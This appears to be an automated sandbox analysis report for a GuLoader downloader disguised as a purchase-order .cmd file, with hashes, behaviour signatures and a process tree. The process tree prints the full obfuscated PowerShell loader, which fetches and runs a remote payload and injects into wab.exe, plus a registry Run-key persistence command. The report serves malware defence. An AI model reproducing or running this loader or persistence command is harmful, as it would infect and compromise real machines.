Overview

overview

10

Static

static

1

rfq_final_...24.cmd

windows7-x64

10

rfq_final_...24.cmd

windows10-2004-x64

10

Analysis

  • max time kernel
    117s
  • max time network
    117s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    11-09-2024 01:44

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    rfq_final_product_purchase_order_import_list_10_09_2024_00000024.cmd

  • Size

    6KB

  • MD5

    f7ba2a252aad41953101bc4032d650ee

  • SHA1

    9647596c54892c99981179267b193da9643aa839

  • SHA256

    842c000429c7e5787fb9fd0961238758e04b4af6c6b56dc4bb0c4db27af69fce

  • SHA512

    1a33c465faa62a5397eab362912967b25604cb8320e2ec5faf44374bc161d054b1e0e217100fbdea331b9114e4221e689531b46fd7b435020a7af43d28a98682

  • SSDEEP

    192:VQW8A6936logZZQlXtVaEGmpQnYHZYya0wb7:6E6pGZ59mOnYfaXb7

Score
10/10
guloaderdiscoverydownloaderexecutionpersistence

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\rfq_final_product_purchase_order_import_list_10_09_2024_00000024.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2092
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Ledning='Forureningsfri';$modernises=${host}.Runspace;If ($modernises) {$Livmoderne++;$Ledning+='suppliancies';$Unregenerative='su';$Ledning+='Mmede105';$Unregenerative+='bs';$Ledning+='Rosewoods';$Unregenerative+='tri';$Ledning+='Fjeld';$Unregenerative+='ng';};Function Endgate($Udlovnings){$Speers=$Udlovnings.Length-$Livmoderne;For( $Fremsaette=4;$Fremsaette -lt $Speers;$Fremsaette+=5){$Albuminerne+=$Udlovnings.$Unregenerative.'Invoke'( $Fremsaette, $Livmoderne);}$Albuminerne;}function Plumbagos($Permissionen){ . ($Boost) ($Permissionen);}$Calciphobic=Endgate ' .plM NeooSvovzD sriUncrlBem.l.ibeaStov/Hnge5Logn.Bemy0blod T.an(MillWServiPseunNdbrdRepao A.aw Ukls Amp ImpeN FedT Fed Go f1Ol.o0dege.Trav0 Fin;Avou DeesWHypeiEmisnAfsp6 om4Fakt;sir. K lexEul 6 R,l4V df; Pub Regur .orvVers:S,as1Etn,2,efr1Syds. Re 0 fpl)Genu BactGcoheeDemicApprk HydoNysk/Om h2 Mm 0Junk1 Res0L ge0Seyc1Stim0Besl1Dogm SoleFCopei AmirF useCorrfMikroInf.xFert/Ungl1 Int2Ant,1Over. Vin0Ska ';$Horsefeathers5=Endgate 'KiddUTilvsArm eIlanr.sia-RerrA Be.geu oeNglenImp,t Roa ';$Hypersphere=Endgate 'Su,eh Ovet Hngt KlopAntisldr,:Bord/Udlo/Genbn.orloTe,et,akka CenrEn siOpl,u alvsLakfnNecraNa eyAtcodLovfe natn outo fodvKooraAero.StraeC.ncu So,/SurhwEinkpProg-Sja,aIndfdR.jemFun,iTypen Pil/MammuBegysSkake idirtenasry s/ ,ahSRivetPro.eAptev EkseFrugtsubcsProb.Deduc RecsDds.v ugg>Arbeh Subt tortOrcapMonasFaku: St./Sele/profjPortrvomieOratxP otpTarirDe eeglumsskresUpcufH rorSanie saciFensgsnu.h ShitKrig.P owcInfroMilimSnre/Fin wParapNaer- haraResud,afemDis iConsn.isk/PudeuSeissTinte NeorMak,sDysl/ CheS Ralt,eleeInfivAntielengtChals De .ScricOvers,llov aer ';$Pouncing=Endgate 'Logi>Udfl ';$Boost=Endgate 'SmatiDo peHomoxBar ';$Fremsaettedeomania='programudviklingen';$Tienkou = Endgate ' O.seEvnecSt,ah MiloAmt, O ph%Oms a ,tepOpl.p VaadDe aa atatboi,aUrte%Nata\EmbrSJubeu TenpEdi.eOpkorSpaldfel.yTolviOprenPreegSqua. I.cSD stuS bvtHelt U su& San& R,i AdveeVarmcMetahEnpuoChou FluetMini ';Plumbagos (Endgate 'Over$ Livg ejflUdluo,ogmbNi.ka Strl Omr:H svMTankoTodiaTr,krPolyiCal,aStopnMaks=,ome(EftecSamsmLevidEn,l ua v/CalicFeat Mixb$MaleT lani,ommeHo snBandkHa soKogauKreb)Husv ');Plumbagos (Endgate 'Cons$Vi agP ill onoBystbSta aDipnlWaen:InspMHypeiPurgnCitreSirerRadiaP.cclVotevFre.aJellnJackd PlusHepaf phiaedifbOutwr Pe,iEnvokAlmekElsaePodon obl=Re e$Fle HMiscyDiglpSemieMonor SujsJu,epUm,ehRecoeOu.prL.noeBere.,akks .hep.euclSlaaiNogetTrde(Skat$AquaPProgoor kuGlasnFeroc I,fiOvernHjemgPaab)Hemi ');Plumbagos (Endgate 'Kamp[TrooN AnoeBergtSaml.StraS LovePhytr M lv F ciHu,bc TuseTidtP.ageoJoyliTri,n MnstBiscMFolkaGrupnAl,maDeargbitre In,rfor,]Prog: Epi:AstrS Yase,tvncCar.uTuderCodeiR.setUnexyBugsPDiasrKommoRelat,kito.irecStemoPtomlClad Ball=beli Ridd[SpecN.nfae.rectapo .SvagSD.stesh.kcSquiuAfter Fo,iI.extExpryLasePS gnrLithosy,ctForsoGruncbackoCivilLakeT.artyAl,epVelkeGaen] Fug:Deta:SlamT HuslBuens tra1Alie2Pend ');$Hypersphere=$Mineralvandsfabrikken[0];$Stiftelsesfesternes= (Endgate 'Batc$TinggSezelB,rdoJol,bflydaRegel.dap:Un,uUcoilnArgutUnshaEncosHirtt.ppeePigef E,su Regl Pl =c.coNTaleeHalvw .ee-TrocO Eryb aanj arie.ugncDesetBegr VisiSHan yHilmsTerbtSteneDiskmpa.a. F.rNForseT lbt phi. .inW Fine,ndlbEndeCvarmlMilli AgreUnden Indt');$Stiftelsesfesternes+=$Moarian[1];Plumbagos ($Stiftelsesfesternes);Plumbagos (Endgate 'Tilr$WearUC ttnKiltt,echa QuasD,nktAut eWo,dfRadiuAf.rl Mir.ax,aHBitreSortaSodadPerfePortrmugesL st[Svup$ LysHDiopoFu.kr H gs mbueTidsfCandeMetaa St tGenkhAnspeRederStans Dri5.ids]Arbe=Tide$NedsCOve,a TillSacic empiAnaepDazih I ooNvnsbSkkeiFilmc dko ');$Seamier75=Endgate 'Temp$ TwyUHyp,nSilkt remamawksAnvetMoo.eBaadfPelau KlflPro .NonsDCarboKe.lwIndun sovlT kvo TyeaDrosdSpisFTandiEncolU ree Rad(Stet$KrusH N.ky .rup B.aeNa orSe,ssBl,op,dtrh B.ieBumpr,holeT,sm,vink$AnvzScu.vkBlikuS eprTit.e .ivd,osteTrim)sjlf ';$Skurede=$Moarian[0];Plumbagos (Endgate ' Er,$Cut,gS rilPenso Augb Kn aNonvlBeig: DelVCompibasnk KontSym u.ejla.urzl In,iteore H.avN.nei UudrT,lsk DissCe eoFullmTrash Fe e HetdUp.aeGldsr .vesS uk=spar(GenkTMerre,erosArtet Byp-Pat.P Paua Sekts.ruh or Reub$SpydSExcekBerbuUdvir H.neAfgrdM.moeWatt) Sp, ');while (!$Viktualievirksomheders) {Plumbagos (Endgate 'Nona$LandgHenslE doo ostb.andaFluolMyct: PriLVrdiy Hi d egnbTolelIntegBaadePedi=Fi e$FraatLy tr,aaduConveBurd ') ;Plumbagos $Seamier75;Plumbagos (Endgate 'UnreS MirtConsasm.erD,kut Lib- AutSResulPorne LepeSlutpTone Smi 4Albu ');Plumbagos (Endgate 'U,co$Pockg Fj lForto.runbTailaGudblTe.r: TonVAntiiBathkCruet,rovujttea H,rlEleviH lleOutbvPareiTe,dr E.ekdog.sPartoRegem Pythph.ce ppld.igaeOverrOversElio=Bede(Y,rdT EpieUnexsPhottSner-invaPalliaHuactStaghNoma Snb$S,riSSa,kkQuicu gnerUnaceIs,adFr ne Tet)Stad ') ;Plumbagos (Endgate ' Foo$Baetg GinlEksponyhebBas a H.alFde,: FacBpresrHaywuasy,dGanosOmfoi FrekZe,or PsyeArv,sSko t CooeTin.sUnas=,omb$,rddgKultlOdoro Hypb U.pa ,aslPolo:DaciO.embvMakkeKlodrTeknpConcrUn.eoPropnDivioReleuHeadnJernc .raeGeocdTurb+Feli+Fort% Dec$F,akMProti DadnKinoePrecr ,leaExpalSammvImdeaF,sin,nfad.rchs,ntifKlagaOverbKostrDaiji KemkPhotkSunseSardnAlko.UdracVildoPassuMil,nPatrtFemt ') ;$Hypersphere=$Mineralvandsfabrikken[$Brudsikrestes];}$Untasselled=338696;$Babysitterens=28100;Plumbagos (Endgate 'Peri$Sp rgQuarlLn ooUn,fbElecaNivelFje :P,ktIY ris Ac.oamylg KemeEco,n ateoF,gltdepuyMo ip D,tetilf T.av=agon ettGHougeOr kt .po-.fstCSindoGon,nOp.ht.utleFlacnGodktPill Hal$BredSPhytkQ.aduDandrDekaeTrind audeEn,u ');Plumbagos (Endgate 'Bra,$KroegTi.elJamboS.nabS.ova.llelFisk:Hy,rKMariuS amlTethl FejaSprggVa,erNon.e Ark Tor =Ki,e La,t[,itiS O.jy UppsIntrtFo.ee ronmTrig.Sno,CHe moprotn iopvBurseUna,rMatctFers]Srtr: S u:LeucFSc.rrAfviot,knmSy eBE,izaAsi sDiese,dsp6 ,it4outpSMummtMasdrstaviG,nbnGldegSter(Tusi$TusiI Miss,iamoP.tigPrepeNod.n piro Cant,ngly,njopDy eeVgge)Sknd ');Plumbagos (Endgate 'Test$C.mmgI.dslfen.oIndsbFlaaaudlblRee :NewsN,ongoSub.nTje,e conr .ulrDinkoElfonA rveLavnoSkatu Tu,sDannl WeeyTr.m Bill=Ad l Ove[ ,etSHistyJomfsSammtTaxieOv.rm Spa.MockTGewgeUna,xSpidt Pot.,andE IllnmulccVideoKritdSt,giFac,nBubbgForb]Fuco: Ant:dimiAFabrSVansCDetaI.rebIRelo.KontGFdeeeExtrtBourSArcht Pe.rUnliiMa.en Prog.tik( Yai$NedtKVerduJacklforhl,venaS.rigMeror Emae lap)Vand ');Plumbagos (Endgate 'Exc.$RevegSjuslGrizo Ri,b MeraStopl D g: Di BSammeTvans HvaoSponvTil e,auknFir.d Gene Gat=Reve$SynsNS reo ,epn TraeMi srRet.rEroboEnyanForbeConfoRamlu.acosBulnl AnayForl.GumbsJouruRakebInbrs,indtNarcrFo liRugenAffigTimo(Ex.t$ De U.ognnSifft.enoaTr,ks .ussPreseStoplMotilpseue.afkdUnco,Glad$ T.aB to aFan.bOveryAccesGly,i G.rtP.rrtUtureCon.rOvere EksnAutosFart) Mo ');Plumbagos $Besovende;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2160
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Superdying.Sut && echo t"
        3⤵
          PID:3004
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ledning='Forureningsfri';$modernises=${host}.Runspace;If ($modernises) {$Livmoderne++;$Ledning+='suppliancies';$Unregenerative='su';$Ledning+='Mmede105';$Unregenerative+='bs';$Ledning+='Rosewoods';$Unregenerative+='tri';$Ledning+='Fjeld';$Unregenerative+='ng';};Function Endgate($Udlovnings){$Speers=$Udlovnings.Length-$Livmoderne;For( $Fremsaette=4;$Fremsaette -lt $Speers;$Fremsaette+=5){$Albuminerne+=$Udlovnings.$Unregenerative.'Invoke'( $Fremsaette, $Livmoderne);}$Albuminerne;}function Plumbagos($Permissionen){ . ($Boost) ($Permissionen);}$Calciphobic=Endgate ' .plM NeooSvovzD sriUncrlBem.l.ibeaStov/Hnge5Logn.Bemy0blod T.an(MillWServiPseunNdbrdRepao A.aw Ukls Amp ImpeN FedT Fed Go f1Ol.o0dege.Trav0 Fin;Avou DeesWHypeiEmisnAfsp6 om4Fakt;sir. K lexEul 6 R,l4V df; Pub Regur .orvVers:S,as1Etn,2,efr1Syds. Re 0 fpl)Genu BactGcoheeDemicApprk HydoNysk/Om h2 Mm 0Junk1 Res0L ge0Seyc1Stim0Besl1Dogm SoleFCopei AmirF useCorrfMikroInf.xFert/Ungl1 Int2Ant,1Over. Vin0Ska ';$Horsefeathers5=Endgate 'KiddUTilvsArm eIlanr.sia-RerrA Be.geu oeNglenImp,t Roa ';$Hypersphere=Endgate 'Su,eh Ovet Hngt KlopAntisldr,:Bord/Udlo/Genbn.orloTe,et,akka CenrEn siOpl,u alvsLakfnNecraNa eyAtcodLovfe natn outo fodvKooraAero.StraeC.ncu So,/SurhwEinkpProg-Sja,aIndfdR.jemFun,iTypen Pil/MammuBegysSkake idirtenasry s/ ,ahSRivetPro.eAptev EkseFrugtsubcsProb.Deduc RecsDds.v ugg>Arbeh Subt tortOrcapMonasFaku: St./Sele/profjPortrvomieOratxP otpTarirDe eeglumsskresUpcufH rorSanie saciFensgsnu.h ShitKrig.P owcInfroMilimSnre/Fin wParapNaer- haraResud,afemDis iConsn.isk/PudeuSeissTinte NeorMak,sDysl/ CheS Ralt,eleeInfivAntielengtChals De .ScricOvers,llov aer ';$Pouncing=Endgate 'Logi>Udfl ';$Boost=Endgate 'SmatiDo peHomoxBar ';$Fremsaettedeomania='programudviklingen';$Tienkou = Endgate ' O.seEvnecSt,ah MiloAmt, O ph%Oms a ,tepOpl.p VaadDe aa atatboi,aUrte%Nata\EmbrSJubeu TenpEdi.eOpkorSpaldfel.yTolviOprenPreegSqua. I.cSD stuS bvtHelt U su& San& R,i AdveeVarmcMetahEnpuoChou FluetMini ';Plumbagos (Endgate 'Over$ Livg ejflUdluo,ogmbNi.ka Strl Omr:H svMTankoTodiaTr,krPolyiCal,aStopnMaks=,ome(EftecSamsmLevidEn,l ua v/CalicFeat Mixb$MaleT lani,ommeHo snBandkHa soKogauKreb)Husv ');Plumbagos (Endgate 'Cons$Vi agP ill onoBystbSta aDipnlWaen:InspMHypeiPurgnCitreSirerRadiaP.cclVotevFre.aJellnJackd PlusHepaf phiaedifbOutwr Pe,iEnvokAlmekElsaePodon obl=Re e$Fle HMiscyDiglpSemieMonor SujsJu,epUm,ehRecoeOu.prL.noeBere.,akks .hep.euclSlaaiNogetTrde(Skat$AquaPProgoor kuGlasnFeroc I,fiOvernHjemgPaab)Hemi ');Plumbagos (Endgate 'Kamp[TrooN AnoeBergtSaml.StraS LovePhytr M lv F ciHu,bc TuseTidtP.ageoJoyliTri,n MnstBiscMFolkaGrupnAl,maDeargbitre In,rfor,]Prog: Epi:AstrS Yase,tvncCar.uTuderCodeiR.setUnexyBugsPDiasrKommoRelat,kito.irecStemoPtomlClad Ball=beli Ridd[SpecN.nfae.rectapo .SvagSD.stesh.kcSquiuAfter Fo,iI.extExpryLasePS gnrLithosy,ctForsoGruncbackoCivilLakeT.artyAl,epVelkeGaen] Fug:Deta:SlamT HuslBuens tra1Alie2Pend ');$Hypersphere=$Mineralvandsfabrikken[0];$Stiftelsesfesternes= (Endgate 'Batc$TinggSezelB,rdoJol,bflydaRegel.dap:Un,uUcoilnArgutUnshaEncosHirtt.ppeePigef E,su Regl Pl =c.coNTaleeHalvw .ee-TrocO Eryb aanj arie.ugncDesetBegr VisiSHan yHilmsTerbtSteneDiskmpa.a. F.rNForseT lbt phi. .inW Fine,ndlbEndeCvarmlMilli AgreUnden Indt');$Stiftelsesfesternes+=$Moarian[1];Plumbagos ($Stiftelsesfesternes);Plumbagos (Endgate 'Tilr$WearUC ttnKiltt,echa QuasD,nktAut eWo,dfRadiuAf.rl Mir.ax,aHBitreSortaSodadPerfePortrmugesL st[Svup$ LysHDiopoFu.kr H gs mbueTidsfCandeMetaa St tGenkhAnspeRederStans Dri5.ids]Arbe=Tide$NedsCOve,a TillSacic empiAnaepDazih I ooNvnsbSkkeiFilmc dko ');$Seamier75=Endgate 'Temp$ TwyUHyp,nSilkt remamawksAnvetMoo.eBaadfPelau KlflPro .NonsDCarboKe.lwIndun sovlT kvo TyeaDrosdSpisFTandiEncolU ree Rad(Stet$KrusH N.ky .rup B.aeNa orSe,ssBl,op,dtrh B.ieBumpr,holeT,sm,vink$AnvzScu.vkBlikuS eprTit.e .ivd,osteTrim)sjlf ';$Skurede=$Moarian[0];Plumbagos (Endgate ' Er,$Cut,gS rilPenso Augb Kn aNonvlBeig: DelVCompibasnk KontSym u.ejla.urzl In,iteore H.avN.nei UudrT,lsk DissCe eoFullmTrash Fe e HetdUp.aeGldsr .vesS uk=spar(GenkTMerre,erosArtet Byp-Pat.P Paua Sekts.ruh or Reub$SpydSExcekBerbuUdvir H.neAfgrdM.moeWatt) Sp, ');while (!$Viktualievirksomheders) {Plumbagos (Endgate 'Nona$LandgHenslE doo ostb.andaFluolMyct: PriLVrdiy Hi d egnbTolelIntegBaadePedi=Fi e$FraatLy tr,aaduConveBurd ') ;Plumbagos $Seamier75;Plumbagos (Endgate 'UnreS MirtConsasm.erD,kut Lib- AutSResulPorne LepeSlutpTone Smi 4Albu ');Plumbagos (Endgate 'U,co$Pockg Fj lForto.runbTailaGudblTe.r: TonVAntiiBathkCruet,rovujttea H,rlEleviH lleOutbvPareiTe,dr E.ekdog.sPartoRegem Pythph.ce ppld.igaeOverrOversElio=Bede(Y,rdT EpieUnexsPhottSner-invaPalliaHuactStaghNoma Snb$S,riSSa,kkQuicu gnerUnaceIs,adFr ne Tet)Stad ') ;Plumbagos (Endgate ' Foo$Baetg GinlEksponyhebBas a H.alFde,: FacBpresrHaywuasy,dGanosOmfoi FrekZe,or PsyeArv,sSko t CooeTin.sUnas=,omb$,rddgKultlOdoro Hypb U.pa ,aslPolo:DaciO.embvMakkeKlodrTeknpConcrUn.eoPropnDivioReleuHeadnJernc .raeGeocdTurb+Feli+Fort% Dec$F,akMProti DadnKinoePrecr ,leaExpalSammvImdeaF,sin,nfad.rchs,ntifKlagaOverbKostrDaiji KemkPhotkSunseSardnAlko.UdracVildoPassuMil,nPatrtFemt ') ;$Hypersphere=$Mineralvandsfabrikken[$Brudsikrestes];}$Untasselled=338696;$Babysitterens=28100;Plumbagos (Endgate 'Peri$Sp rgQuarlLn ooUn,fbElecaNivelFje :P,ktIY ris Ac.oamylg KemeEco,n ateoF,gltdepuyMo ip D,tetilf T.av=agon ettGHougeOr kt .po-.fstCSindoGon,nOp.ht.utleFlacnGodktPill Hal$BredSPhytkQ.aduDandrDekaeTrind audeEn,u ');Plumbagos (Endgate 'Bra,$KroegTi.elJamboS.nabS.ova.llelFisk:Hy,rKMariuS amlTethl FejaSprggVa,erNon.e Ark Tor =Ki,e La,t[,itiS O.jy UppsIntrtFo.ee ronmTrig.Sno,CHe moprotn iopvBurseUna,rMatctFers]Srtr: S u:LeucFSc.rrAfviot,knmSy eBE,izaAsi sDiese,dsp6 ,it4outpSMummtMasdrstaviG,nbnGldegSter(Tusi$TusiI Miss,iamoP.tigPrepeNod.n piro Cant,ngly,njopDy eeVgge)Sknd ');Plumbagos (Endgate 'Test$C.mmgI.dslfen.oIndsbFlaaaudlblRee :NewsN,ongoSub.nTje,e conr .ulrDinkoElfonA rveLavnoSkatu Tu,sDannl WeeyTr.m Bill=Ad l Ove[ ,etSHistyJomfsSammtTaxieOv.rm Spa.MockTGewgeUna,xSpidt Pot.,andE IllnmulccVideoKritdSt,giFac,nBubbgForb]Fuco: Ant:dimiAFabrSVansCDetaI.rebIRelo.KontGFdeeeExtrtBourSArcht Pe.rUnliiMa.en Prog.tik( Yai$NedtKVerduJacklforhl,venaS.rigMeror Emae lap)Vand ');Plumbagos (Endgate 'Exc.$RevegSjuslGrizo Ri,b MeraStopl D g: Di BSammeTvans HvaoSponvTil e,auknFir.d Gene Gat=Reve$SynsNS reo ,epn TraeMi srRet.rEroboEnyanForbeConfoRamlu.acosBulnl AnayForl.GumbsJouruRakebInbrs,indtNarcrFo liRugenAffigTimo(Ex.t$ De U.ognnSifft.enoaTr,ks .ussPreseStoplMotilpseue.afkdUnco,Glad$ T.aB to aFan.bOveryAccesGly,i G.rtP.rrtUtureCon.rOvere EksnAutosFart) Mo ');Plumbagos $Besovende;"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2636
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Superdying.Sut && echo t"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2384
          • C:\Program Files (x86)\windows mail\wab.exe
            "C:\Program Files (x86)\windows mail\wab.exe"
            4⤵
            • Suspicious use of NtCreateThreadExHideFromDebugger
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1776
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Adspreder" /t REG_EXPAND_SZ /d "%Hydropsy% -w 1 $Disulphoxide=(Get-ItemProperty -Path 'HKCU:\Outputtet\').Restorative;%Hydropsy% ($Disulphoxide)"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2008
              • C:\Windows\SysWOW64\reg.exe
                REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Adspreder" /t REG_EXPAND_SZ /d "%Hydropsy% -w 1 $Disulphoxide=(Get-ItemProperty -Path 'HKCU:\Outputtet\').Restorative;%Hydropsy% ($Disulphoxide)"
                6⤵
                • Adds Run key to start application
                • System Location Discovery: System Language Discovery
                • Modifies registry key
                PID:2056

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FJI5IE2PCMVRQK54VIPN.temp
      Filesize

      7KB

      MD5

      0325b496a2d41052c70acfac95d46277

      SHA1

      f613d50736cfdf20a19902f7dcfd64abeb03868a

      SHA256

      b8df4b08285d5c71f739437d7414f195e083b5afdd59c57b670e1ae59ef363f4

      SHA512

      e94d6e49d29541ce0571da8a68988d9b10342f8411e99c54fa86c7e34f42d2a01406263e061670a18a159ff3c903ccb1b49ce52b4bbf63e5a3d3c8f35c11e4fb

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Superdying.Sut
      Filesize

      477KB

      MD5

      f86cf96350847ef06a870ce588bb94d1

      SHA1

      3df50292fbe1f11c77349ad7e208bc55b7ef0d9d

      SHA256

      f81623ea997e763d23e9f0a91ab6ec679d5cebe77e67b1283319725f5fc5ebe9

      SHA512

      3f123baef2e58adb8333039bfeb2704877d413f42bec247c0afe396db95497b32378b6126543d9383ac32f447de4ce36e97f7a512472732f944083fc1cb3b055

      Download Submit

    • memory/1776-40-0x0000000000E10000-0x0000000006064000-memory.dmp

      Filesize

      82.3MB

      Download

    • memory/1776-22-0x0000000000400000-0x0000000000581000-memory.dmp

      Filesize

      1.5MB

      Download

    • memory/2160-8-0x000007FEF61B0000-0x000007FEF6B4D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2160-10-0x000007FEF61B0000-0x000007FEF6B4D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2160-11-0x000007FEF61B0000-0x000007FEF6B4D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2160-9-0x000007FEF61B0000-0x000007FEF6B4D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2160-12-0x000007FEF646E000-0x000007FEF646F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2160-13-0x000007FEF61B0000-0x000007FEF6B4D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2160-14-0x000007FEF61B0000-0x000007FEF6B4D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2160-4-0x000007FEF646E000-0x000007FEF646F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2160-6-0x0000000002260000-0x0000000002268000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2160-7-0x000007FEF61B0000-0x000007FEF6B4D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2160-5-0x000000001B730000-0x000000001BA12000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2160-42-0x000007FEF61B0000-0x000007FEF6B4D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2636-20-0x0000000006870000-0x000000000BAC4000-memory.dmp

      Filesize

      82.3MB

      Download